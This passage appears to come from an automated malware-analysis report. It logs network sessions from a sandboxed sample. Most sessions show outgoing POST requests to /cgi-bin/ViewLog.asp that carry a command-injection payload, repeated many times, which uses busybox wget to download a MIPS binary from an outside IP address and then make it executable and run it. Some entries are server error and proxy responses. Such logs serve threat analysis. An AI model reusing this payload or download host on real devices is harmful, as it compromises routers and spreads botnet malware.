                                              Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72
                                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-inter


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              739192.168.2.143369231.136.179.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.570638895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.144848108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.296827078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.824712038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              740192.168.2.145789462.29.31.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.614592075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              741192.168.2.144683494.120.224.308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:17.734355927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              742192.168.2.1455496154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.011598110 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:17Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              743192.168.2.1455522154.206.158.24923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.652374983 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:17Auth Result: .
                                              Nov 23, 2023 05:18:19.653068066 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 38 3a 31 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:18:17Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              744192.168.2.143795694.239.96.708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.675062895 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.033305883 CET458INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 02:06:08 GMT
                                              Server: Apache
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              745192.168.2.145513895.164.84.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.682734966 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.873102903 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              746192.168.2.143428694.120.31.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.728247881 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              747192.168.2.143615085.246.84.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.815157890 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              748192.168.2.144056095.239.84.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.863445997 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              749192.168.2.145887662.29.95.1888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.868401051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              750192.168.2.143662095.165.29.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:18.980648994 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.288634062 CET436INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:18:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: keep-alive
                                              Location: https://192.168.0.14/cgi-bin/ViewLog.asp
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              751192.168.2.144658894.123.182.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.061355114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              752192.168.2.145591094.120.154.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.088184118 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              753192.168.2.143617685.246.84.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:19.129570961 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
